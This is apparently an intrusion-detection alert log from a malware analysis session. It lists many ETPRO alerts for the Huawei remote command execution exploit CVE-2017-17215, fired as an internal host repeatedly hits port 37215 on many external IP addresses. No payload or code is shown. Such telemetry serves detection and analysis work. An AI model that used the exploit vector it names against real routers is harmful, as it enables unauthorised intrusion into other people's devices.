                                                    07/10/24-08:27:24.990906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072437215192.168.2.14197.198.178.209
                                                    07/10/24-08:27:17.053274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231437215192.168.2.1441.99.27.71
                                                    07/10/24-08:26:36.417902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814637215192.168.2.1441.164.122.99
                                                    07/10/24-08:26:43.745002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318037215192.168.2.14157.132.128.242
                                                    07/10/24-08:26:28.846857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5402837215192.168.2.14157.190.100.14
                                                    07/10/24-08:27:11.479148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947637215192.168.2.1441.148.254.56
                                                    07/10/24-08:26:43.857526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079037215192.168.2.14197.29.225.91
                                                    07/10/24-08:26:57.603262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917037215192.168.2.1441.44.21.75
                                                    07/10/24-08:27:19.199825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519037215192.168.2.14157.20.195.179
                                                    07/10/24-08:27:23.453618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862237215192.168.2.14109.249.226.119
                                                    07/10/24-08:26:36.431557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504037215192.168.2.14208.109.99.65
                                                    07/10/24-08:26:59.649070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612037215192.168.2.1423.101.220.177
                                                    07/10/24-08:26:43.781564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948637215192.168.2.1441.126.194.244
                                                    07/10/24-08:27:19.343381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828037215192.168.2.1441.52.145.55
                                                    07/10/24-08:27:19.253799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648037215192.168.2.14157.77.106.14
                                                    07/10/24-08:27:07.259600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658637215192.168.2.1470.238.218.185
                                                    07/10/24-08:27:19.251231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463837215192.168.2.14157.73.71.155
                                                    07/10/24-08:27:34.127270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014837215192.168.2.14157.247.127.209
                                                    07/10/24-08:26:47.835000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540637215192.168.2.1441.52.173.16
                                                    07/10/24-08:26:17.972385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4460637215192.168.2.1480.141.182.205
                                                    07/10/24-08:27:22.871657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295237215192.168.2.1441.106.156.208
                                                    07/10/24-08:26:57.576804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700037215192.168.2.14197.66.186.248
                                                    07/10/24-08:27:33.831803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5243637215192.168.2.14157.32.28.164
                                                    07/10/24-08:26:47.832991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899437215192.168.2.1441.50.62.94
                                                    07/10/24-08:27:33.730213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5645837215192.168.2.1484.165.32.28
                                                    07/10/24-08:26:22.222070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349637215192.168.2.14197.118.100.112
                                                    07/10/24-08:26:47.896576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050037215192.168.2.1441.169.155.189
                                                    07/10/24-08:26:31.081950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188837215192.168.2.14138.212.227.228
                                                    07/10/24-08:27:33.681754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886037215192.168.2.1441.223.121.67
                                                    07/10/24-08:26:28.927122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586237215192.168.2.14197.21.122.114
                                                    07/10/24-08:27:13.894598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740037215192.168.2.1437.71.87.238
                                                    07/10/24-08:26:13.753198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885837215192.168.2.1441.53.146.130
                                                    07/10/24-08:27:20.445959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524237215192.168.2.1441.244.12.131
                                                    07/10/24-08:27:17.070048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512837215192.168.2.1441.236.72.153
                                                    07/10/24-08:26:42.454249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918237215192.168.2.1441.186.70.189
                                                    07/10/24-08:26:11.494095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683837215192.168.2.14197.227.245.236
                                                    07/10/24-08:27:16.979192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4879837215192.168.2.1463.167.185.175
                                                    07/10/24-08:27:24.878204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979437215192.168.2.14197.189.62.141
                                                    07/10/24-08:26:55.367702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316437215192.168.2.14197.26.164.38
                                                    07/10/24-08:26:57.636058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562237215192.168.2.14197.93.37.98
                                                    07/10/24-08:27:10.629706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066237215192.168.2.14105.229.144.195
                                                    07/10/24-08:26:41.559243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605837215192.168.2.1441.146.50.21
                                                    07/10/24-08:27:08.371486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285437215192.168.2.148.126.81.89
                                                    07/10/24-08:27:23.848972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960837215192.168.2.14197.239.127.252
                                                    07/10/24-08:27:33.867801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5404837215192.168.2.1441.173.221.192
                                                    07/10/24-08:26:14.809030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548637215192.168.2.1441.134.114.30
                                                    07/10/24-08:26:22.242541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154437215192.168.2.14197.255.177.53
                                                    07/10/24-08:26:33.243765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971437215192.168.2.14101.18.181.151
                                                    07/10/24-08:26:36.421240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490237215192.168.2.1441.0.114.121
                                                    07/10/24-08:26:45.616284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743837215192.168.2.14149.241.179.44
                                                    07/10/24-08:26:49.784403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4584837215192.168.2.1441.241.63.125
                                                    07/10/24-08:27:10.636807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866437215192.168.2.1441.190.20.31
                                                    07/10/24-08:26:11.127756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727237215192.168.2.14197.238.249.245
                                                    07/10/24-08:27:02.830604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775437215192.168.2.14197.104.152.42
                                                    07/10/24-08:26:14.822212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623837215192.168.2.1441.204.51.95
                                                    07/10/24-08:26:57.523580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463637215192.168.2.14197.34.235.143
                                                    07/10/24-08:27:13.894673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570237215192.168.2.1441.40.38.101
                                                    07/10/24-08:26:29.837168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331837215192.168.2.14197.101.68.107
                                                    07/10/24-08:26:34.231574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478837215192.168.2.14157.113.245.129
                                                    07/10/24-08:26:11.513425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038037215192.168.2.1441.36.60.196
                                                    07/10/24-08:27:20.512534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775037215192.168.2.14197.166.21.3
                                                    07/10/24-08:26:48.030999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4366237215192.168.2.14197.128.48.152
                                                    07/10/24-08:27:10.675558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4323437215192.168.2.14197.122.52.94
                                                    07/10/24-08:26:11.537516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285037215192.168.2.14157.101.215.139
                                                    07/10/24-08:26:29.858032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400237215192.168.2.1441.231.255.248
                                                    07/10/24-08:26:20.188191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206637215192.168.2.14157.98.164.52
                                                    07/10/24-08:26:28.836881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616637215192.168.2.14123.76.51.216
                                                    07/10/24-08:27:34.131250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192237215192.168.2.14197.82.157.87
                                                    07/10/24-08:27:19.191289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930237215192.168.2.1441.221.136.234
                                                    07/10/24-08:27:19.327774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916837215192.168.2.14157.51.84.145
                                                    07/10/24-08:26:25.490164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027437215192.168.2.14163.40.43.195
                                                    07/10/24-08:26:31.106544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574837215192.168.2.14181.130.81.217
                                                    07/10/24-08:26:48.024550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719037215192.168.2.1489.159.36.55
                                                    07/10/24-08:26:53.185788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3459837215192.168.2.14197.44.52.48
                                                    07/10/24-08:27:20.521213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600837215192.168.2.14197.51.148.67
                                                    07/10/24-08:26:31.046264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574837215192.168.2.14110.127.190.105
                                                    07/10/24-08:26:28.921893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624237215192.168.2.1431.210.200.143
                                                    07/10/24-08:27:08.448345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141837215192.168.2.1478.150.68.3
                                                    07/10/24-08:27:11.546125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3666637215192.168.2.14157.222.90.72
                                                    07/10/24-08:27:22.919171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499037215192.168.2.14157.39.222.112
                                                    07/10/24-08:26:18.019292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686437215192.168.2.1441.174.17.39
                                                    07/10/24-08:27:20.401175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304237215192.168.2.14157.193.20.205
                                                    07/10/24-08:27:31.571103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121837215192.168.2.14197.7.234.147
                                                    07/10/24-08:26:38.648004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603037215192.168.2.14197.84.214.188
                                                    07/10/24-08:26:41.551601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630037215192.168.2.14103.0.193.160
                                                    07/10/24-08:27:13.834773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798037215192.168.2.1486.180.3.171
                                                    07/10/24-08:27:27.122406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4548237215192.168.2.14197.55.214.164
                                                    07/10/24-08:26:28.778339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679437215192.168.2.1441.112.213.31
                                                    07/10/24-08:27:11.476399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3583437215192.168.2.14157.157.7.124
                                                    07/10/24-08:26:38.623017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296837215192.168.2.14197.27.32.219
                                                    07/10/24-08:27:27.141072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680637215192.168.2.14157.226.76.214
                                                    07/10/24-08:26:31.084191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258837215192.168.2.14157.86.1.107
                                                    07/10/24-08:26:45.645798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5468437215192.168.2.1478.115.74.128
                                                    07/10/24-08:27:24.993711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133037215192.168.2.14153.214.202.252
                                                    07/10/24-08:26:59.761557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309637215192.168.2.14157.38.82.78
                                                    07/10/24-08:26:20.085617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848837215192.168.2.14191.42.235.44
                                                    07/10/24-08:26:33.201787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260037215192.168.2.14135.116.134.149
                                                    07/10/24-08:27:10.591175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765637215192.168.2.1441.113.115.170
                                                    07/10/24-08:26:25.516790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515237215192.168.2.14197.183.94.46
                                                    07/10/24-08:26:59.817840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374037215192.168.2.14157.40.143.37
                                                    07/10/24-08:27:19.219162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887237215192.168.2.1419.230.14.38
                                                    07/10/24-08:26:38.632510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5320437215192.168.2.1441.118.196.76
                                                    07/10/24-08:26:26.527286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291437215192.168.2.14140.25.241.77
                                                    07/10/24-08:27:22.917695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424637215192.168.2.1441.162.211.133
                                                    07/10/24-08:26:41.500020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3573837215192.168.2.14197.253.61.65
                                                    07/10/24-08:27:19.202917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478837215192.168.2.14197.197.247.17
                                                    07/10/24-08:27:20.405672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4601237215192.168.2.1441.147.242.163
                                                    07/10/24-08:26:22.282645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621237215192.168.2.14157.5.217.18
                                                    07/10/24-08:26:14.751683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121037215192.168.2.1441.91.129.72
                                                    07/10/24-08:26:17.971584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560637215192.168.2.14197.250.98.30
                                                    07/10/24-08:26:33.175813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552837215192.168.2.14157.204.218.82
                                                    07/10/24-08:26:47.766848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5896637215192.168.2.1441.170.42.206
                                                    07/10/24-08:26:17.996521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868437215192.168.2.1478.74.71.171
                                                    07/10/24-08:26:33.240926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737837215192.168.2.14157.46.3.218
                                                    07/10/24-08:27:11.531009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636837215192.168.2.1441.37.70.28
                                                    07/10/24-08:27:17.044301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027437215192.168.2.14197.59.118.152
                                                    07/10/24-08:26:23.320405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428637215192.168.2.1498.214.224.42
                                                    07/10/24-08:26:49.784403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863037215192.168.2.1441.252.22.171
                                                    07/10/24-08:27:10.621060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025437215192.168.2.1441.132.76.205
                                                    07/10/24-08:27:17.093550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608037215192.168.2.1487.194.252.7
                                                    07/10/24-08:26:49.827119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990837215192.168.2.1441.105.246.169
                                                    07/10/24-08:27:03.014226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977637215192.168.2.14157.178.248.87
                                                    07/10/24-08:26:36.339944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391437215192.168.2.1441.161.169.142
                                                    07/10/24-08:27:13.880072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645037215192.168.2.1441.183.150.16
                                                    07/10/24-08:27:34.133115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629837215192.168.2.14197.95.161.105
                                                    07/10/24-08:27:02.998271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070037215192.168.2.1441.94.243.119
                                                    07/10/24-08:27:08.426882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513837215192.168.2.14197.138.129.237
                                                    07/10/24-08:26:26.608381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349237215192.168.2.14197.105.149.232
                                                    07/10/24-08:26:43.870902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207837215192.168.2.1441.29.212.23
                                                    07/10/24-08:26:33.206417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4455437215192.168.2.14157.120.144.224
                                                    07/10/24-08:26:42.353894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728237215192.168.2.14197.209.116.209
                                                    07/10/24-08:26:55.367702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669237215192.168.2.14122.119.133.146
                                                    07/10/24-08:26:59.541812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465837215192.168.2.14197.3.255.125
                                                    07/10/24-08:27:31.465521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084437215192.168.2.14197.26.31.23
                                                    07/10/24-08:26:17.989759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3665837215192.168.2.14157.203.79.123
                                                    07/10/24-08:26:22.283182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108237215192.168.2.1424.220.123.161
                                                    07/10/24-08:26:28.741314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931637215192.168.2.14157.178.150.145
                                                    07/10/24-08:26:41.404911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694437215192.168.2.1441.206.124.240
                                                    07/10/24-08:27:08.367822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188037215192.168.2.14197.37.136.180
                                                    07/10/24-08:26:15.880564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879437215192.168.2.1441.74.115.8
                                                    07/10/24-08:27:19.261102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206837215192.168.2.1441.27.160.143
                                                    07/10/24-08:26:22.232329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592237215192.168.2.1441.0.234.160
                                                    07/10/24-08:27:05.230856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750437215192.168.2.14205.131.44.193
                                                    07/10/24-08:26:36.381629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605237215192.168.2.14197.219.230.95
                                                    07/10/24-08:26:17.996817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4456637215192.168.2.1453.80.233.113
                                                    07/10/24-08:26:14.806143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634637215192.168.2.14162.248.10.72
                                                    07/10/24-08:26:22.300019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586637215192.168.2.1441.188.219.164
                                                    07/10/24-08:27:24.871352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993237215192.168.2.14157.84.174.77
                                                    07/10/24-08:27:17.088792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482037215192.168.2.14197.224.162.43
                                                    07/10/24-08:26:26.529610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853837215192.168.2.1441.28.224.82
                                                    07/10/24-08:26:31.069487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264237215192.168.2.14197.71.87.248
                                                    07/10/24-08:26:26.611798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745637215192.168.2.14157.34.116.52
                                                    07/10/24-08:26:33.189850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543437215192.168.2.14157.23.12.199
                                                    07/10/24-08:27:22.896648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667637215192.168.2.14115.109.149.164
                                                    07/10/24-08:26:38.578082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450237215192.168.2.1441.79.55.36
                                                    07/10/24-08:26:52.012219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723237215192.168.2.1441.77.154.31
                                                    07/10/24-08:26:15.809769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790837215192.168.2.1441.232.17.122
                                                    07/10/24-08:26:59.569562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887837215192.168.2.14197.16.155.129
                                                    07/10/24-08:27:30.541927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433037215192.168.2.14157.75.49.160
                                                    07/10/24-08:26:28.773956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746237215192.168.2.14197.6.18.169
                                                    07/10/24-08:27:33.970965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658437215192.168.2.1441.56.196.111
                                                    07/10/24-08:26:15.875137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3991437215192.168.2.1441.117.253.175
                                                    07/10/24-08:26:41.452783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481637215192.168.2.14157.90.20.39
                                                    07/10/24-08:26:36.437126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507837215192.168.2.1441.98.94.21
                                                    07/10/24-08:26:36.424443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695237215192.168.2.14121.105.146.110
                                                    07/10/24-08:26:41.611798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737637215192.168.2.14197.219.64.13
                                                    07/10/24-08:27:19.340130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091837215192.168.2.14157.12.250.17
                                                    07/10/24-08:27:22.917695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207037215192.168.2.14202.24.125.140
                                                    07/10/24-08:27:14.672861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3466437215192.168.2.14197.95.162.158
                                                    07/10/24-08:27:23.818099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567037215192.168.2.14197.173.209.242
                                                    07/10/24-08:27:11.491951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441037215192.168.2.1473.186.27.156
                                                    07/10/24-08:26:22.214237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453237215192.168.2.14110.214.98.223
                                                    07/10/24-08:27:11.562285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352437215192.168.2.1441.80.78.94
                                                    07/10/24-08:27:27.047085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826637215192.168.2.1441.246.40.115
                                                    07/10/24-08:26:20.098381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750837215192.168.2.14157.69.224.201
                                                    07/10/24-08:26:47.880980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743437215192.168.2.14197.17.152.177
                                                    07/10/24-08:26:59.579530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652437215192.168.2.14157.244.246.195
                                                    07/10/24-08:26:29.781420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251037215192.168.2.14157.191.10.198
                                                    07/10/24-08:26:42.406060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221237215192.168.2.14157.85.47.192
                                                    07/10/24-08:26:31.081032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911837215192.168.2.1441.248.100.195
                                                    07/10/24-08:27:10.631590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207237215192.168.2.1441.138.105.118
                                                    07/10/24-08:26:25.461446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396237215192.168.2.14197.92.0.161
                                                    07/10/24-08:26:34.179823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917037215192.168.2.1441.234.195.173
                                                    07/10/24-08:26:41.430084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911037215192.168.2.14197.77.86.193
                                                    07/10/24-08:27:10.629470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637037215192.168.2.1441.46.79.44
                                                    07/10/24-08:27:31.527963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203837215192.168.2.14155.145.49.102
